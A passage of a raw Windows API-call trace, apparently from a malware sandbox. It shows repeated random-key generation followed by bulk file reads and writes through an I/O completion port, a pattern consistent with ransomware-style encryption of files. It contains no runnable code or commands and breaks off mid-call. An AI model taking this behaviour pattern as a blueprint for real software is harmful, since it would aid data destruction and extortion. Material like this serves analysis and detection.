0x753f1e2e [0076.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0076.934] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.934] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.934] free (_Block=0x77d800) [0076.934] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.934] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.935] free (_Block=0x1ff1930) [0076.935] free (_Block=0x1ff1a40) [0076.935] free (_Block=0x77d908) [0076.935] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.940] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0076.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.961] ReadFile (in: hFile=0x3a8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x18208, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0076.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.189] CloseHandle (hObject=0x3a0) returned 1 [0079.189] free (_Block=0x3d70048) [0079.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.203] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x227a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.222] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x26670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.253] CloseHandle (hObject=0x3c0) returned 1 [0079.253] free (_Block=0x3db00b8) [0079.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.261] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1e96c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.621] CloseHandle (hObject=0x3c4) returned 1 [0079.622] free (_Block=0x1fb18c0) [0079.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.637] CloseHandle (hObject=0x3bc) returned 1 [0079.637] free (_Block=0x3df0008) [0079.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.650] CloseHandle (hObject=0x3ac) returned 1 [0079.656] free (_Block=0x3d70048) [0079.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.668] CloseHandle (hObject=0x3a0) returned 1 [0079.668] free (_Block=0x1ff1e60) [0079.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.682] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x55f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.697] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0079.704] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.707] CloseHandle (hObject=0x3ac) returned 1 [0079.707] free (_Block=0x3d70048) [0079.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.708] CloseHandle (hObject=0x3a0) returned 1 [0079.709] free (_Block=0x1ff1e60) [0079.710] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.784] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x75d, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.796] CloseHandle (hObject=0x3c0) returned 1 [0079.797] free (_Block=0x2031ed0) [0079.801] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.804] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb8c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0079.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.826] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x12d98, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.844] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x14cd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.860] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x26618, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.879] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x28558, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.882] CloseHandle (hObject=0x3c4) returned 1 [0079.888] free (_Block=0x1fb18c0) [0079.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0079.902] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0079.903] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.903] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.903] free (_Block=0x1ff1e60) [0079.903] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.903] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.903] free (_Block=0x1ff1e60) [0079.903] free (_Block=0x1ff1930) [0079.903] free (_Block=0x77d800) [0079.903] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.906] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x2e320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.926] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x39e98, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.930] CloseHandle (hObject=0x3c4) returned 1 [0079.936] free (_Block=0x1fb18c0) [0079.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0079.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0079.946] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.946] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.947] free (_Block=0x1ff1e60) [0079.947] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.947] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.947] free (_Block=0x1ff1e60) [0079.947] free (_Block=0x1ff1930) [0079.947] free (_Block=0x77d800) [0079.947] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.948] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.959] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x239b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.960] CloseHandle (hObject=0x3c4) returned 1 [0079.964] free (_Block=0x1fb18c0) [0079.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0079.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0079.974] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.974] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.974] free (_Block=0x1ff1e60) [0079.974] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.974] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.975] free (_Block=0x1ff1e60) [0079.975] free (_Block=0x1ff1930) [0079.975] free (_Block=0x77d800) [0079.975] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0079.975] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.029] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x505, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.040] CloseHandle (hObject=0x3c4) returned 1 [0080.041] free (_Block=0x1fb18c0) [0080.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.049] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1276, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.089] CloseHandle (hObject=0x3b4) returned 1 [0080.089] free (_Block=0x3d70048) [0080.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.104] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x6aa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0080.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.124] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.140] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x6a91, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.298] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x422c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.300] CloseHandle (hObject=0x3b4) returned 1 [0080.303] free (_Block=0x3d70048) [0080.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.321] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.321] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.321] free (_Block=0x1ff1e60) [0080.321] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.321] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.321] free (_Block=0x1ff1e60) [0080.321] free (_Block=0x1ff1930) [0080.321] free (_Block=0x77d800) [0080.321] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 